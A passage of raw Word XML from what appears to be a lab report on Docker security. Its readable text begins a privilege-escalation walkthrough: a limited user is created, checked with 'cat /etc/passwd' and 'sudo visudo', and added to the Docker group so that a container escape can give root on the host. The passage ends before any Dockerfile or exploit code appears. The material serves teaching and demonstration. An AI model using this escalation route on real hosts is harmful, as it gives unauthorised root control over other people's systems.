        <w:t>. All the steps taken to execute each attack are presented in screenshots along with a brief explanation of the commands and methods applied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1531DC6E" w14:textId="5205E731" w:rsidR="00B036F9" w:rsidRDefault="00B036F9" w:rsidP="00B036F9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="117" w:name="_Toc87032937"/>
      <w:r>
        <w:t>Privilege Escalation Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="117"/>
    </w:p>
    <w:p w14:paraId="478314EC" w14:textId="049B11CD" w:rsidR="00181332" w:rsidRDefault="00477958" w:rsidP="00181332">
      <w:r>
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="00CF2CAF">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r>
        <w:t>attack</w:t>
      </w:r>
      <w:r w:rsidR="00CF2CAF">
        <w:t>’s primary purpose</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is to show how a user with limited privilege can elevate </w:t>
      </w:r>
      <w:r w:rsidR="00A213D1">
        <w:t>to a root user. Therefore, a user is created on the host machine using the command shown in figure 1</w:t>
      </w:r>
      <w:r w:rsidR="00363029">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00623591">
        <w:t xml:space="preserve"> and is verified </w:t>
      </w:r>
      <w:r w:rsidR="008E24EC">
        <w:t>as shown in figure 1</w:t>
      </w:r>
      <w:r w:rsidR="00363029">
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="008E24EC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F9BFF3" w14:textId="57E35800" w:rsidR="00A213D1" w:rsidRDefault="00A213D1" w:rsidP="00A213D1">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31AAB517" wp14:editId="264F76DA">
            <wp:extent cx="4597400" cy="2380946"/>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98610" cy="2381573"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B3E47F" w14:textId="29A29FB2" w:rsidR="00A213D1" w:rsidRDefault="005D38BA" w:rsidP="00A213D1">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="118" w:name="_Toc86858609"/>
      <w:bookmarkStart w:id="119" w:name="_Toc86867499"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00A213D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">igure </w:t>
      </w:r>
      <w:r w:rsidR="00A213D1" w:rsidRPr="00A213D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A213D1" w:rsidRPr="00A213D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00A213D1" w:rsidRPr="00A213D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidR="00A213D1" w:rsidRPr="00A213D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A213D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: user created on the host machine.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
      <w:bookmarkEnd w:id="119"/>
    </w:p>
    <w:p w14:paraId="387EB56F" w14:textId="203F721D" w:rsidR="008E24EC" w:rsidRDefault="008E24EC" w:rsidP="008E24EC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C64F7C8" wp14:editId="2E398E68">
            <wp:extent cx="4476114" cy="2012950"/>
            <wp:effectExtent l="0" t="0" r="127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76770" cy="2013245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D098F30" w14:textId="27DC765E" w:rsidR="008E24EC" w:rsidRDefault="008E24EC" w:rsidP="008E24EC">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="120" w:name="_Toc86858610"/>
      <w:bookmarkStart w:id="121" w:name="_Toc86867500"/>
      <w:r w:rsidRPr="008E24EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="008E24EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="008E24EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="008E24EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidRPr="008E24EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008E24EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>output of</w:t>
      </w:r>
      <w:r w:rsidR="00A33322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A33322" w:rsidRPr="00A33322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r w:rsidRPr="00A33322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command on the host</w:t>
      </w:r>
      <w:r w:rsidRPr="008E24EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="120"/>
      <w:bookmarkEnd w:id="121"/>
    </w:p>
    <w:p w14:paraId="1F38CCAE" w14:textId="143D2A4E" w:rsidR="0049257F" w:rsidRDefault="0049257F" w:rsidP="0049257F">
      <w:r>
        <w:t xml:space="preserve">Further, the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00500A61">
        <w:t>is created with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> no permission to run </w:t>
      </w:r>
      <w:r w:rsidR="00500A61">
        <w:t xml:space="preserve">any </w:t>
      </w:r>
      <w:r>
        <w:t>root commands</w:t>
      </w:r>
      <w:r w:rsidR="00500A61">
        <w:t xml:space="preserve">. The output of the </w:t>
      </w:r>
      <w:r w:rsidR="00500A61" w:rsidRPr="00A33322">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>sudo visudo</w:t>
      </w:r>
      <w:r w:rsidR="00500A61">
        <w:t xml:space="preserve"> command shown in </w:t>
      </w:r>
      <w:r w:rsidR="00363029">
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="00500A61">
        <w:t xml:space="preserve"> verifies that the </w:t>
      </w:r>
      <w:r w:rsidR="00267FB1">
        <w:t xml:space="preserve">attacker user is not a member of the </w:t>
      </w:r>
      <w:r w:rsidR="00267FB1">
        <w:lastRenderedPageBreak/>
        <w:t>root users</w:t>
      </w:r>
      <w:r w:rsidR="00CF2CAF">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00677B1C">
        <w:t xml:space="preserve"> However,</w:t>
      </w:r>
      <w:r w:rsidR="00CF2CAF">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00CF2CAF">
        <w:t>ultimate goal</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CF2CAF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00677B1C">
        <w:t>is to</w:t>
      </w:r>
      <w:r w:rsidR="00CF2CAF">
        <w:t xml:space="preserve"> compromise and control the host machine without knowing its root password and elevate the attacker to </w:t>
      </w:r>
      <w:r w:rsidR="00677B1C">
        <w:t>the root groups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1B0040" w14:textId="427E5B73" w:rsidR="00715F67" w:rsidRDefault="00715F67" w:rsidP="00715F67">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FFAB7AB" wp14:editId="164F004B">
            <wp:extent cx="4526979" cy="2501900"/>
            <wp:effectExtent l="0" t="0" r="698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38025" cy="2508005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="048717BC" w14:textId="4C09CF31" w:rsidR="00715F67" w:rsidRDefault="00715F67" w:rsidP="00715F67">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="122" w:name="_Toc86858611"/>
      <w:bookmarkStart w:id="123" w:name="_Toc86867501"/>
      <w:r w:rsidRPr="00715F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00715F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00715F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00715F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00715F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00715F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: output </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidRPr="00715F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sudo visudo.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>
      <w:bookmarkEnd w:id="123"/>
    </w:p>
    <w:p w14:paraId="0941DE63" w14:textId="342B1913" w:rsidR="002A6FBC" w:rsidRDefault="002A6FBC" w:rsidP="002A6FBC">
      <w:r>
        <w:t xml:space="preserve">However, the user </w:t>
      </w:r>
      <w:r w:rsidR="008C21B4">
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="00F465EF">
        <w:t xml:space="preserve">needs to have Docker permission </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F465EF">
        <w:t>in order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F465EF">
        <w:t xml:space="preserve"> interact with Docker. Thus, the user is added to the Docker group using the command in figure </w:t>
      </w:r>
      <w:r w:rsidR="00B40144">
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidR="00F465EF">
        <w:t xml:space="preserve">. This implies that the user can </w:t>
      </w:r>
      <w:r w:rsidR="008C21B4">
        <w:t>run and interact with Docker</w:t>
      </w:r>
      <w:r w:rsidR="0041050A">
        <w:t>. Figure 2</w:t>
      </w:r>
      <w:r w:rsidR="00B40144">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="0041050A">
        <w:t xml:space="preserve"> is the output of the </w:t>
      </w:r>
      <w:r w:rsidR="0041050A" w:rsidRPr="00A33322">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>getent group</w:t>
      </w:r>
      <w:r w:rsidR="0041050A">
        <w:t xml:space="preserve"> Linux command, showing that the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00A33322">
        <w:t xml:space="preserve">is part of </w:t>
      </w:r>
      <w:r w:rsidR="0041050A">
        <w:t>the Docker group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731575FE" w14:textId="77777777" w:rsidR="00363029" w:rsidRDefault="00363029" w:rsidP="002A6FBC"/>
    <w:p w14:paraId="4156920B" w14:textId="7F4B85B2" w:rsidR="00F465EF" w:rsidRDefault="00F465EF" w:rsidP="00F465EF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3425D094" wp14:editId="317D2A46">
            <wp:extent cx="4438650" cy="7429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438650" cy="742950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5504D7" w14:textId="20E4CAB2" w:rsidR="00F465EF" w:rsidRDefault="00F465EF" w:rsidP="00F465EF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="124" w:name="_Toc86858612"/>
      <w:bookmarkStart w:id="125" w:name="_Toc86867502"/>
      <w:r w:rsidRPr="00F465EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00F465EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00F465EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00F465EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidRPr="00F465EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00F465EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: user added to the Docker group.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="124"/>
      <w:bookmarkEnd w:id="125"/>
    </w:p>
    <w:p w14:paraId="6C495458" w14:textId="07C2B6AB" w:rsidR="0041050A" w:rsidRDefault="0041050A" w:rsidP="0041050A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DEB334F" wp14:editId="2B878E8D">
            <wp:extent cx="3162300" cy="20828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62300" cy="2082800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33053A79" w14:textId="394A05F0" w:rsidR="0041050A" w:rsidRPr="00D331CB" w:rsidRDefault="0041050A" w:rsidP="00D331CB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="126" w:name="_Toc86858613"/>
      <w:bookmarkStart w:id="127" w:name="_Toc86867503"/>
      <w:r w:rsidRPr="0041050A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="0041050A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0041050A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0041050A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidRPr="0041050A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0041050A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: output of the getent group command.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="126"/>
      <w:bookmarkEnd w:id="127"/>
    </w:p>
    <w:p w14:paraId="78A9F1A4" w14:textId="2052F7FD" w:rsidR="0049257F" w:rsidRDefault="00A213D1" w:rsidP="0049257F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="007F7E38">
        <w:t>following steps and procedures have been used to build the platform for the attacker</w:t>
      </w:r>
      <w:r w:rsidR="005D38BA">
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidR="0049257F">
        <w:t>Dockerfile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0060C8" w14:textId="33918A51" w:rsidR="0049257F" w:rsidRDefault="00267FB1" w:rsidP="0049257F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A file directory named escape is created on the home directory of the attacker user</w:t>
      </w:r>
      <w:r w:rsidR="00677B1C">
        <w:t xml:space="preserve">, as shown in figure </w:t>
      </w:r>
      <w:r w:rsidR="0041050A">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00B40144">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>. Its</w:t>
      </w:r>
      <w:r w:rsidR="00677B1C">
        <w:t xml:space="preserve"> primary</w:t>
